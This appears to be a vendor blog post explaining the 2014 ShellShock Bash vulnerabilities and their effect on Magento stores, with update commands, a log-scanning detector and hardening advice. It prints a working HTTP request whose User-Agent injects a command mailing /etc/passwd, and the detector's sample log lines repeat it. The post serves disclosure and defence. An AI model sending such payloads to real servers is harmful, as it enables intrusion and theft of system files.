Meet ShellShock

DISCLAIMER
The software mentioned in the article is provided AS IS, and we do not take any responsibility for any issues or losses that can be caused by its usage.

What ShellShock is about

Details of a new vulnerability in a basic component of many distributions were published last week. It affects the Bash command interpreter, which is undoubtedly the most popular command interpreter at the moment.

Thousands of websites suffered from various kinds of attacks, from DoS to command and control deployment attempts. This vulnerability was called ShellShock, also known as Bashdoor.

The CVE-2014-6271 vulnerability was widely announced last week and rapidly fixed in all the major distributions.

On the next day, the CVE-2014-7169 vulnerability was announced. It described a way to bypass the CVE-2014-6271 patch and was fixed too. Two more Bash vulnerabilities were announced on that day: CVE-2014-7186 and CVE-2014-7187.

You need local user rights on the server to take advantage of the last two weaknesses, and therefore they are not as dangerous as the first two (CVE-2014-6271 and CVE-2014-7169).

ShellShock Checker from Amasty

We created a ShellShock Checker that lets you run an express check for possible vulnerabilities on your server.

To use the Checker, you need local user rights on the servers being examined. We do not recommend using the root user for the test. List your servers in the SERVERS variable in check_shellshock.sh and comment out line #4.

Regardless of the test result, we strongly recommend updating Bash to the latest version available.

Instructions on updating Bash for various distributions

Debian/Ubuntu

sudo apt-get update && sudo apt-get install --only-upgrade bash

RHEL/CentOS

sudo yum update bash

ShellShock and your Magento store

We conducted a small study to find out how the ShellShock vulnerability affects Magento.
An unpatched Bash version was installed on one of our test servers with Apache and mod_cgi. Then a cron task was added to one of the Magento extensions to run this command (the code can be arbitrary, as long as it uses system/exec/passthru or similar functions):

system('/bin/bash -c id');

We attacked http://shellshock.local/cron.php with the following request:

GET /cron.php HTTP/1.1
Host: shellshock.local
User-Agent: () { :;}; /usr/sbin/mail -s cron root@shellshock.local < /etc/passwd

As a result of the test attack, root@shellshock.local received an email containing the /etc/passwd file.

After testing various configurations, we came to the conclusion that the issue is relevant for setups where PHP works with Apache/mod_cgi and Apache/mod_cgid. It looks like the Apache/mod_php and Nginx + FastCGI combinations are not affected (although we do not 100% guarantee that).
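
To see whether a server has already received requests like the one above, its access log can be searched for the "() {" function-definition prefix. The script below is an added example, not part of the Amasty Checker; it assumes Apache's combined log format, the function name is ours, and the log lines are constructed (the first and last reuse the request shown above).

```python
import re

# Apache "combined" log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)
# An exported Bash function starts with "() {"; extra spaces are tolerated
# so that near-miss probes are reported too.
FUNC_PREFIX = re.compile(r'\(\)\s*\{')

# Constructed sample lines (documentation IP ranges, assumed sizes and timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Sep/2014:10:12:01 +0000] "GET /cron.php HTTP/1.1" 200 512 '
    '"-" "() { :;}; /usr/sbin/mail -s cron root@shellshock.local < /etc/passwd"',
    '203.0.113.20 - - [30/Sep/2014:10:12:05 +0000] "GET /index.php HTTP/1.1" 200 20480 '
    '"http://shellshock.local/" "Mozilla/5.0 (X11; Linux x86_64)"',
    # "()" without "{" must not be reported
    '203.0.113.20 - - [30/Sep/2014:10:12:06 +0000] "GET /js/app.js?cb=init() HTTP/1.1" '
    '200 901 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    # truncated line: the closing quote of the User-Agent is missing
    '198.51.100.7 - - [30/Sep/2014:10:13:44 +0000] "GET /cron.php HTTP/1.1" 200 512 '
    '"-" "() { :;}; /usr/sbin/mail',
]

def find_shellshock_probes(lines):
    """Return one dict per log line that carries a function-definition prefix."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if m is None:
            # Truncated or non-standard line: scan the raw text instead of skipping it.
            if FUNC_PREFIX.search(line):
                hits.append({"line": lineno, "host": None, "fields": ["raw"]})
            continue
        host, request, status, referer, agent = m.groups()
        named = {"request": request, "referer": referer, "agent": agent}
        fields = [name for name, value in named.items() if FUNC_PREFIX.search(value)]
        if fields:
            hits.append({"line": lineno, "host": host, "request": request,
                         "status": status, "fields": fields})
    return hits

if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(hit)
```

The combined format records only the request line, Referer and User-Agent, so an empty result does not show that no other header carried the string, and a logged status of 200 does not show whether the command ran.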

Steps to protect your Magento from the cron.php attack

  • Update Bash to the latest version available;
  • Make sure cron.php is available only from the list of your trusted IPs;
  • If that’s possible, replace the /bin/sh system shell, for instance, with dash.

And the main conclusion: always update your software on time! It helps to avoid many possible server issues and reduces the risk of attacks.

Got some thoughts on the ShellShock impact? Share your experience in comments.